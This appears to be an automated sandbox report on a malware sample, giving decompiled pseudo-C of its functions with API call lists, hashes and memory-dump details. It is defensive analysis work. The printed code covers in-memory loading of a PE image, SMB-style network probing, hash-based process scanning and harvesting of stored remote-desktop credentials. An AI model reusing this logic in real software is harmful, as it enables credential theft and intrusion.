Opcode ID: 8fb74b0bb47c7dca8351dafc92369b4d23a5e38fd35639806c2b1f85a16ef0b3
Instruction ID: 6a2f1789bcc930528b0fa35cb2e0c7d3251fcebce9545c308b95921eb43bab32
Opcode Fuzzy Hash: 8fb74b0bb47c7dca8351dafc92369b4d23a5e38fd35639806c2b1f85a16ef0b3
Instruction Fuzzy Hash: 83D012B560020DBBDB20DB94ED0AF9D7778EB55749F50811CB506D1090D7BCDF119B24

Uniqueness

Uniqueness Score: -1.00%

Function 007B923F Relevance: 6.1, APIs: 4, Instructions: 89
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E007B923F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				void* __esi;
				void* _t14;
				void* _t19;
				void* _t22;
				void* _t31;
				long _t35;
				void* _t40;
				intOrPtr _t42;
				int _t44;
				void* _t47;
				long _t48;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				if( *0x7c7b8c != 0) {
					L15:
					return 0;
				}
				_t52 =  *0x7c3984; // 0x444ff8
				if(_t52 == 0) {
					goto L15;
				}
				_t14 =  *0x7c7b98;
				_t44 =  *( *((intOrPtr*)(_t14 + 0x3c)) + _t14 + 0x50);
				_t40 = _t14;
				_v8 = _t44;
				_t31 = VirtualAlloc(0, _t44, 0x1000, 4);
				if(_t31 == 0) {
					L14:
					goto L15;
				}
				 *0x7c7bb4 = _t31;
				memcpy(_t31, _t40, _t44);
				_t42 =  *0x7c3984; // 0x444ff8
				_t47 =  *((intOrPtr*)(_t42 + 0x3c)) + _t42;
				if(_t47 != 0) {
					_t21 =  *((intOrPtr*)(_t47 + 0xa0));
					if( *((intOrPtr*)(_t47 + 0xa0)) != 0 &&  *((intOrPtr*)(_t47 + 0xa4)) != 0) {
						_t22 = E007B8FD1(_t47, _t21);
						_t23 = _t22 + _t42;
						if(_t22 + _t42 != 0 && E007B8EA9(_t23, _t31) != 0 && E007B8F35(_t47, _t31) != 0) {
							_push(0xffffffff);
							_push(_a12);
							_push(_a8);
							_push(_a4);
							 *((intOrPtr*)(E007B9154 -  *0x7c7b98 + _t31))();
						}
					}
				}
				_t48 = _v8;
				if(VirtualProtect(_t31, _t48, 4,  &_v12) == 0) {
					goto L14;
				}
				_t35 = _t48;
				_t19 = _t31;
				if(_t48 == 0) {
					L13:
					VirtualFree(_t31, _t48, 0x4000);
					goto L14;
				} else {
					goto L12;
				}
				do {
					L12:
					 *_t19 = 0;
					_t19 = _t19 + 1;
					_t35 = _t35 - 1;
				} while (_t35 != 0);
				goto L13;
			}

0x007b9242
0x007b9243
0x007b924c
0x007b932c
0x007b932f
0x007b932f
0x007b9252
0x007b9258
0x00000000
0x00000000
0x007b925e
0x007b9268
0x007b9276
0x007b9278
0x007b9281
0x007b9285
0x007b9329
0x00000000
0x007b932b
0x007b928e
0x007b9294
0x007b9299
0x007b92a5
0x007b92a7
0x007b92a9
0x007b92b1
0x007b92bf
0x007b92c4
0x007b92c6
0x007b92de
0x007b92e0
0x007b92e8
0x007b92f1
0x007b92f6
0x007b92f6
0x007b92c6
0x007b92b1
0x007b92f8
0x007b930b
0x00000000
0x00000000
0x007b930d
0x007b930f
0x007b9313
0x007b931c
0x007b9323
0x00000000
0x00000000
0x00000000
0x00000000
0x007b9315
0x007b9315
0x007b9315
0x007b9318
0x007b9319
0x007b9319
0x00000000

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,?,007B79FC,?,?,?), ref: 007B927B
memcpy.MSVCRT ref: 007B9294
VirtualProtect.KERNEL32(00000000,?,00000004,?), ref: 007B9303
VirtualFree.KERNEL32(00000000,?,00004000), ref: 007B9323

Part of subcall function 007B8F35: VirtualProtect.KERNEL32(00000000,?,00000002,00000000,00000000,00000000,00000000), ref: 007B8F52
Part of subcall function 007B8F35: VirtualProtect.KERNEL32(00000000,?,00000002,?,00444FF8), ref: 007B8FB0

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Virtual$Protect$AllocFreememcpy
String ID:
API String ID: 2644210-0
Opcode ID: fc7d4f196edf41ee2a1c6ecb60fec1cbbe68eec368dadaa69ff49d4c5ed51e33
Instruction ID: 649cb0f568ce265da938b1c01bd80402f26fd4eba464f31841f01edd41cd4fc9
Opcode Fuzzy Hash: fc7d4f196edf41ee2a1c6ecb60fec1cbbe68eec368dadaa69ff49d4c5ed51e33
Instruction Fuzzy Hash: CA21B6B1600216BBDB249F699C48FEBB7ACBF44755F08412CBB25E7291EA78DD00C764

Uniqueness

Uniqueness Score: -1.00%

Function 007BBECB Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E007BBECB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t34;
				int _t39;
				int _t41;
				void* _t49;
				intOrPtr _t52;
				int _t53;
				int _t54;
				intOrPtr _t57;
				int _t60;
				int _t62;
				intOrPtr _t64;
				void* _t65;

				_t57 = _a4;
				_t64 =  *((intOrPtr*)(_t57 + 0x1c));
				if( *(_t64 + 0x34) != 0) {
					L3:
					if( *(_t64 + 0x28) == 0) {
						 *(_t64 + 0x28) = 1 <<  *(_t64 + 0x24);
						 *(_t64 + 0x30) = 0;
						 *(_t64 + 0x2c) = 0;
					}
					_t60 =  *(_t64 + 0x28);
					_t52 = _a12;
					_t34 = _a8;
					if(_t52 < _t60) {
						_t62 =  >  ? _t52 : _t60 -  *(_t64 + 0x30);
						memcpy( *(_t64 + 0x34) +  *(_t64 + 0x30), _t34 - _t52, _t62);
						_t53 = _t52 - _t62;
						if(_t53 == 0) {
							 *(_t64 + 0x30) =  *(_t64 + 0x30) + _t62;
							_t54 =  *(_t64 + 0x28);
							if( *(_t64 + 0x30) == _t54) {
								 *(_t64 + 0x30) =  *(_t64 + 0x30) & 0x00000000;
							}
							_t39 =  *(_t64 + 0x2c);
							if(_t39 >= _t54) {
								goto L15;
							} else {
								_t41 = _t39 + _t62;
								goto L14;
							}
						}
						memcpy( *(_t64 + 0x34), _a8 - _t53, _t53);
						 *(_t64 + 0x30) = _t53;
						goto L7;
					} else {
						memcpy( *(_t64 + 0x34), _t34 - _t60, _t60);
						 *(_t64 + 0x30) =  *(_t64 + 0x30) & 0x00000000;
						L7:
						_t41 =  *(_t64 + 0x28);
						L14:
						 *(_t64 + 0x2c) = _t41;
						L15:
						return 0;
					}
				}
				_t49 =  *((intOrPtr*)(_t57 + 0x20))( *((intOrPtr*)(_t57 + 0x28)), 1 <<  *(_t64 + 0x24), 1);
				_t65 = _t65 + 0xc;
				 *(_t64 + 0x34) = 1;
				if(_t49 != 0) {
					goto L3;
				}
				return 1;
			}

0x007bbece
0x007bbed4
0x007bbedf
0x007bbf01
0x007bbf04
0x007bbf0b
0x007bbf0e
0x007bbf11
0x007bbf11
0x007bbf14
0x007bbf17
0x007bbf1a
0x007bbf1f
0x007bbf3e
0x007bbf4c
0x007bbf54
0x007bbf56
0x007bbf6f
0x007bbf72
0x007bbf78
0x007bbf7a
0x007bbf7a
0x007bbf7e
0x007bbf83
0x00000000
0x007bbf85
0x007bbf85
0x00000000
0x007bbf85
0x007bbf83
0x007bbf62
0x007bbf6a
0x00000000
0x007bbf21
0x007bbf28
0x007bbf30
0x007bbf34
0x007bbf34
0x007bbf87
0x007bbf87
0x007bbf8a
0x00000000
0x007bbf8a
0x007bbf1f
0x007bbeed
0x007bbef0
0x007bbef3
0x007bbef8
0x00000000
0x00000000
0x00000000

APIs

memcpy.MSVCRT ref: 007BBF28
memcpy.MSVCRT ref: 007BBF4C
memcpy.MSVCRT ref: 007BBF62

Strings

Oet, xrefs: 007BBECE

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: memcpy
String ID: Oet
API String ID: 3510742995-3042086936
Opcode ID: e1cf1fe39b433a2052a203964ec285a26f42559cf684c062b5f863c33271a48a
Instruction ID: ef56059b7b89fa84409b1d3bc2567c7cf8cc0767dc26e4e6b62abcbcd202d3a7
Opcode Fuzzy Hash: e1cf1fe39b433a2052a203964ec285a26f42559cf684c062b5f863c33271a48a
Instruction Fuzzy Hash: E3214BB2610B019FD7609F29CD84A63B7EAFF987147401A2DE88A87E10D371F954CF50

Uniqueness

Uniqueness Score: -1.00%

Function 007B501E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B501E(void* __ecx, intOrPtr _a4, void* _a8, short _a12, void* _a16, char _a20, void** _a24) {
				void* _t25;
				void* _t28;
				void* _t29;
				signed int _t30;

				_t29 = __ecx;
				_t28 = 0;
				if(E007B2F5A(_a4, _a8, _a12, 0, 0xff, 8, _a16, _a20) != 0) {
					_a20 = 0;
					_a16 = 0;
					if(E007B3071(_t29, _a4, _a8, _a12,  &_a16,  &_a20) != 0) {
						_t25 = _a16;
						if(_a20 == 0x74 &&  *((intOrPtr*)(_t25 + 0x50)) == 0x1c &&  *((intOrPtr*)(_t25 + 0x70)) == 0) {
							_t30 = 5;
							_t25 = memcpy( *_a24, _t25 + 0x5c, _t30 << 2);
							_t28 = 1;
						}
						HeapFree(GetProcessHeap(), 8, _t25);
					}
				}
				return _t28;
			}

0x007b501e
0x007b5025
0x007b5042
0x007b504f
0x007b5055
0x007b5062
0x007b5068
0x007b506b
0x007b5081
0x007b5085
0x007b5088
0x007b508a
0x007b5095
0x007b5095
0x007b5062
0x007b509f

APIs

Part of subcall function 007B2F5A: GetProcessHeap.KERNEL32(00000008,0000FFFF,00000001,00000200,?,?,?,?,?,?,?,?), ref: 007B2F73
Part of subcall function 007B2F5A: HeapAlloc.KERNEL32(00000000), ref: 007B2F7C
Part of subcall function 007B2F5A: GetProcessHeap.KERNEL32(00000008,?,7777C2E0), ref: 007B2F97
Part of subcall function 007B2F5A: HeapAlloc.KERNEL32(00000000), ref: 007B2F9A
Part of subcall function 007B2F5A: htons.WS2_32(424D53FE), ref: 007B2FBA
Part of subcall function 007B2F5A: memcpy.MSVCRT ref: 007B300B
Part of subcall function 007B2F5A: send.WS2_32(?,00000000,?,00000000), ref: 007B301B
Part of subcall function 007B2F5A: recv.WS2_32(?,?,0000FFFF,00000000), ref: 007B3032
Part of subcall function 007B2F5A: GetProcessHeap.KERNEL32(00000008,00000000), ref: 007B3048
Part of subcall function 007B2F5A: HeapFree.KERNEL32(00000000), ref: 007B304F
Part of subcall function 007B2F5A: GetProcessHeap.KERNEL32(00000008,?), ref: 007B305A
Part of subcall function 007B2F5A: HeapFree.KERNEL32(00000000), ref: 007B3061

Part of subcall function 007B3071: GetProcessHeap.KERNEL32(00000008,0000FFFF,74654F20,00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F), ref: 007B3089
Part of subcall function 007B3071: HeapAlloc.KERNEL32(00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B3092
Part of subcall function 007B3071: GetProcessHeap.KERNEL32(00000008,0000003F,74655520,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B30A4
Part of subcall function 007B3071: HeapAlloc.KERNEL32(00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B30A7
Part of subcall function 007B3071: htons.WS2_32(0000003B), ref: 007B30BF
Part of subcall function 007B3071: send.WS2_32(0000002F,00000000,0000003F,00000000), ref: 007B30F7
Part of subcall function 007B3071: recv.WS2_32(0000002F,0000002F,0000FFFF,00000000), ref: 007B310D
Part of subcall function 007B3071: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B3127
Part of subcall function 007B3071: HeapAlloc.KERNEL32(00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B312E
Part of subcall function 007B3071: memcpy.MSVCRT ref: 007B3144
Part of subcall function 007B3071: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B3153
Part of subcall function 007B3071: HeapFree.KERNEL32(00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B315A
Part of subcall function 007B3071: GetProcessHeap.KERNEL32(00000008,0000002F,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B3165
Part of subcall function 007B3071: HeapFree.KERNEL32(00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B316C

GetProcessHeap.KERNEL32(00000008,?,00000000,00000000,?,?,00000000,00000000,00000000,?,00000000,000000FF,00000008,?,00000000,00000000), ref: 007B508E
HeapFree.KERNEL32(00000000,?,007B52E8,?,?,?,00000000), ref: 007B5095

Strings

Oet Uet0Xet, xrefs: 007B508E
t, xrefs: 007B5064

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Process$AllocFree$htonsmemcpyrecvsend
String ID: Oet Uet0Xet$t
API String ID: 2433318192-2047160959
Opcode ID: afef411dbc42e5eb3adbfb904d854fe34c6c154fe3043fdd53257f7c9a1960f9
Instruction ID: a49d53a3fabf88dbf6bcdce9780f4937b88cd7ff0ad8bc99a0ac79505933eb70
Opcode Fuzzy Hash: afef411dbc42e5eb3adbfb904d854fe34c6c154fe3043fdd53257f7c9a1960f9
Instruction Fuzzy Hash: 6211157200060AAFDF11AF90DD85EEB7B29FF153A4F004026FE005A161C73699A6DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 007B855F Relevance: 6.1, APIs: 4, Instructions: 51
processCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E007B855F() {
				char _v524;
				void* _v560;
				int _t8;
				void* _t10;
				signed int _t13;
				signed int _t14;
				void* _t15;

				_t14 = _t13 | 0xffffffff;
				_t15 = CreateToolhelp32Snapshot(2, 0);
				if(_t15 != _t14) {
					_push( &_v560);
					_v560 = 0x22c;
					_t8 = Process32FirstW(_t15);
					while(_t8 != 0) {
						_t10 = E007B82EE( &_v524);
						if(_t10 == 0x4a241c3e) {
							L10:
							_t14 = _t14 & 0xffffffef;
						} else {
							if(_t10 == 0x923ca517) {
								L9:
								_t14 = _t14 & 0xffffffbf;
							} else {
								if(_t10 == 0x966d0415 || _t10 == 0xaa331620) {
									goto L10;
								} else {
									if(_t10 == 0xc8f10976) {
										goto L9;
									} else {
										if(_t10 == 0xe2517a14) {
											goto L10;
										} else {
											if(_t10 == 0xe5a05a00) {
												goto L9;
											}
										}
									}
								}
							}
						}
						_t8 = Process32NextW(_t15,  &_v560);
					}
					CloseHandle(_t15);
				}
				return _t14;
			}

0x007b856e
0x007b8577
0x007b857b
0x007b8583
0x007b8585
0x007b858f
0x007b85ea
0x007b859e
0x007b85a8
0x007b85d9
0x007b85d9
0x007b85aa
0x007b85af
0x007b85d4
0x007b85d4
0x007b85b1
0x007b85b6
0x00000000
0x007b85bf
0x007b85c4
0x00000000
0x007b85c6
0x007b85cb
0x00000000
0x007b85cd
0x007b85d2
0x00000000
0x00000000
0x007b85d2
0x007b85cb
0x007b85c4
0x007b85b6
0x007b85af
0x007b85e4
0x007b85e4
0x007b85ef
0x007b85ef
0x007b85fa

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007B8571
Process32FirstW.KERNEL32(00000000,?), ref: 007B858F
Process32NextW.KERNEL32(00000000,0000022C), ref: 007B85E4
CloseHandle.KERNEL32(00000000,?,00000000), ref: 007B85EF

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 8dcf40cbb0c02e1f5373a46695addcd1779be10a67311ffbc4179ee9d2178861
Instruction ID: bb4a8d29816c573b01c9be6db7ec4a70f42e35b1a144bbf677eb1271c6259b51
Opcode Fuzzy Hash: 8dcf40cbb0c02e1f5373a46695addcd1779be10a67311ffbc4179ee9d2178861
Instruction Fuzzy Hash: 6401B976501618AADBB45AAC9C4CFEF765C5F49320F644752ED22D20E0EE2CCD90CB57

Uniqueness

Uniqueness Score: -1.00%

Function 007B6B46 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 9
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B6B46(char _a4) {

				_t1 =  &_a4; // 0x7b6722
				return HeapFree(GetProcessHeap(), 0,  *_t1);
			}

0x007b6b49
0x007b6b5c

APIs

GetProcessHeap.KERNEL32(00000000,"g{,?,007B6722,?), ref: 007B6B4E
HeapFree.KERNEL32(00000000,?,007B6722,?), ref: 007B6B55

Strings

Oet Uet0Xet, xrefs: 007B6B4E
"g{, xrefs: 007B6B49

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$FreeProcess
String ID: Oet Uet0Xet$"g{
API String ID: 3859560861-2767412117
Opcode ID: c0bf09b6bcd8e421efb30b8b4024ef64d516b6999f0c025cb600b028c0a1295b
Instruction ID: 16159349e340b569ecfa28686d13cd3bc9d700d53e825f26a5bdde3c702e8e8e
Opcode Fuzzy Hash: c0bf09b6bcd8e421efb30b8b4024ef64d516b6999f0c025cb600b028c0a1295b
Instruction Fuzzy Hash: A5C09B72044249B7CB101BD1ED0DFD67F1CF754755F008111F70545050D679D410D769

Uniqueness

Uniqueness Score: -1.00%

Function 007B6628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B6628(void* __ecx, void* __eflags) {
				char _v8;
				char _v12;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				intOrPtr _v40;
				short _v2088;
				void* __edi;
				char _t29;
				short _t31;
				short _t32;
				short _t33;
				short _t34;
				short _t35;
				short _t36;
				short _t37;
				short _t38;
				short _t39;
				short _t40;
				intOrPtr* _t46;
				short _t53;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t61;
				void* _t63;

				_t53 = 0;
				 *0x7c3b90 = 0;
				_v8 = 0;
				_t29 = E007B686C(__ecx,  &_v8, __eflags, 1);
				_v12 = _t29;
				if(_t29 != 0) {
					while(1) {
						_t31 = 0x20;
						_v36 = _t31;
						_t32 = 0x22;
						_v34 = _t32;
						_t33 = 0x25;
						_v32 = _t33;
						_t34 = 0x77;
						_v30 = _t34;
						_t35 = 0x73;
						_v28 = _t35;
						_t36 = 0x3a;
						_v26 = _t36;
						_t37 = 0x25;
						_v24 = _t37;
						_t38 = 0x77;
						_v22 = _t38;
						_t39 = 0x73;
						_v20 = _t39;
						_t40 = 0x22;
						_v18 = _t40;
						_v16 = 0;
						_t17 = _v8 + 4; // 0x8dc38b00
						wsprintfW( &_v2088,  &_v36,  *_v8,  *_t17);
						_t46 =  &_v2088;
						_t63 = _t63 + 0x10;
						_t56 = _t46 + 2;
						do {
							_t57 =  *_t46;
							_t46 = _t46 + 2;
						} while (_t57 != 0);
						_t61 = (_t46 - _t56 >> 1) + _t53;
						if(_t61 < 0x1ff5) {
							StrCatW(0x7c3b90,  &_v2088);
							_v40 = _t61;
							if(E007B6893(_t56,  &_v8) != 0) {
								_t53 = _v40;
								continue;
							}
						}
						E007B6B46(_v12);
						goto L8;
					}
				}
				L8:
				 *0x7c3010 =  *0x7c3010 & 0;
				 *0x7c7b78 = 0;
				return 0;
			}

0x007b663c
0x007b6643
0x007b6649
0x007b664c
0x007b6651
0x007b6656
0x007b6661
0x007b6663
0x007b6666
0x007b666a
0x007b666d
0x007b6671
0x007b6674
0x007b6678
0x007b667b
0x007b667f
0x007b6682
0x007b6686
0x007b6689
0x007b668d
0x007b668e
0x007b6694
0x007b6695
0x007b669b
0x007b669c
0x007b66a2
0x007b66a3
0x007b66a9
0x007b66b0
0x007b66c0
0x007b66c6
0x007b66cc
0x007b66cf
0x007b66d2
0x007b66d2
0x007b66d5
0x007b66d8
0x007b66e1
0x007b66ea
0x007b66f8
0x007b6701
0x007b6714
0x007b665e
0x00000000
0x007b665e
0x007b6714
0x007b671d
0x00000000
0x007b671d
0x007b6661
0x007b6723
0x007b6725
0x007b672c
0x007b6734

APIs

wsprintfW.USER32 ref: 007B66C0
StrCatW.SHLWAPI(007C3B90,?), ref: 007B66F8

Strings

pGdv0Hcv, xrefs: 007B66F8

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: wsprintf
String ID: pGdv0Hcv
API String ID: 2111968516-3560805785
Opcode ID: e504d2bc522b7b8526bbfdddc3abe80347923b6987e1a5600edb077e7dd9d9bf
Instruction ID: e29c87bf302419bea3b7f339d636c4598077c75913b80e945967ebd79c7587ed
Opcode Fuzzy Hash: e504d2bc522b7b8526bbfdddc3abe80347923b6987e1a5600edb077e7dd9d9bf
Instruction Fuzzy Hash: 1E317036914209AADB00CFE4DD51BEE73B4FF08714F10545AEA04EB2A0E7799F408B99

Uniqueness

Uniqueness Score: -1.00%

Function 007B76F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E007B76F2(intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				void* __esi;
				char* _t30;
				signed int _t32;
				intOrPtr _t33;
				signed int _t38;
				signed short* _t41;
				void* _t44;
				char* _t45;
				signed short* _t49;

				_t38 = 0;
				_t30 =  &_v8;
				_v12 = 0;
				_v8 = 0;
				__imp__CredEnumerateW(0, 0, _t30,  &_v12);
				_v24 = _t30;
				if(_t30 == 0) {
					L19:
					return _v24;
				}
				_t32 = 0;
				_v20 = 0;
				if(_v8 <= 0) {
					L18:
					__imp__CredFree(_v12);
					goto L19;
				}
				do {
					_t33 =  *((intOrPtr*)(_v12 + _t32 * 4));
					_t49 =  *(_t33 + 8);
					if(_t49 == _t38) {
						L14:
						if( *((intOrPtr*)(_t33 + 4)) != 2) {
							goto L16;
						}
						L15:
						E007B6B95(_t49, 0, _a4);
						goto L16;
					}
					_v16 = 8;
					_t45 = L"TERMSRV/";
					_t41 = _t49;
					while( *_t41 ==  *_t45) {
						_t41 =  &(_t41[1]);
						_t45 =  &(_t45[2]);
						_t13 =  &_v16;
						 *_t13 = _v16 - 1;
						if( *_t13 != 0) {
							continue;
						}
						_t38 = 0;
						_t44 = 0;
						L8:
						if((0 | _t44 == _t38) == _t38) {
							goto L14;
						}
						_t49 =  &(_t49[8]);
						if( *((intOrPtr*)(_t33 + 4)) != 1) {
							goto L14;
						}
						if( *((intOrPtr*)(_t33 + 0x30)) != _t38 &&  *((intOrPtr*)(_t33 + 0x1c)) != _t38) {
							E007B69AE( *((intOrPtr*)(_t33 + 0x30)),  *((intOrPtr*)(_t33 + 0x1c)), _t38);
						}
						goto L15;
					}
					asm("sbb ecx, ecx");
					_t44 = ( *_t41 & 0xfffe) + 1;
					_t38 = 0;
					goto L8;
					L16:
					_t32 = _v20 + 1;
					_v20 = _t32;
				} while (_t32 < _v8);
				goto L18;
			}

0x007b76fd
0x007b76ff
0x007b7705
0x007b7708
0x007b770b
0x007b7711
0x007b7716
0x007b77c9
0x007b77ce
0x007b77ce
0x007b771c
0x007b771e
0x007b7724
0x007b77c0
0x007b77c3
0x00000000
0x007b77c3
0x007b772c
0x007b7732
0x007b7734
0x007b7739
0x007b779c
0x007b77a0
0x00000000
0x00000000
0x007b77a2
0x007b77a9
0x00000000
0x007b77a9
0x007b773b
0x007b7742
0x007b7747
0x007b7749
0x007b7751
0x007b7754
0x007b7757
0x007b7757
0x007b775a
0x00000000
0x00000000
0x007b775c
0x007b775e
0x007b7760
0x007b7769
0x00000000
0x00000000
0x007b776b
0x007b7772
0x00000000
0x00000000
0x007b7777
0x007b7785
0x007b7785
0x00000000
0x007b7777
0x007b7792
0x007b7797
0x007b7798
0x00000000
0x007b77ae
0x007b77b1
0x007b77b2
0x007b77b5
0x00000000

APIs

CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,0000FFFF), ref: 007B770B
CredFree.ADVAPI32(?,?,00000000,0000FFFF), ref: 007B77C3

Strings

TERMSRV/, xrefs: 007B7742

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Cred$EnumerateFree
String ID: TERMSRV/
API String ID: 3403564193-3001602198
Opcode ID: cad38baa560ea082d96903e40b8d2ce43ce469ab08137c4807c6bf91cf269b97
Instruction ID: 839fa64533ecedf19b657432f18caea1811cd15b36f93d86d80b3f5479a2fe8c
Opcode Fuzzy Hash: cad38baa560ea082d96903e40b8d2ce43ce469ab08137c4807c6bf91cf269b97
Instruction Fuzzy Hash: FF218D72A04105EFCF18DFA5C8C8AEEB7B6FF94314B5584BED102A7251DB389A85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 007B9332 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27
networkCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E007B9332(void* __eax, CHAR* _a4) {
				void* _t16;

				_t16 = 0;
				__imp__#52(_a4);
				if(__eax != 0) {
					wsprintfA(_a4, "%u.%u.%u.%u",  *( *( *(__eax + 0xc))) & 0x000000ff, ( *( *(__eax + 0xc)))[1] & 0x000000ff,  *(_t10 + 2) & 0x000000ff,  *(_t10 + 3) & 0x000000ff);
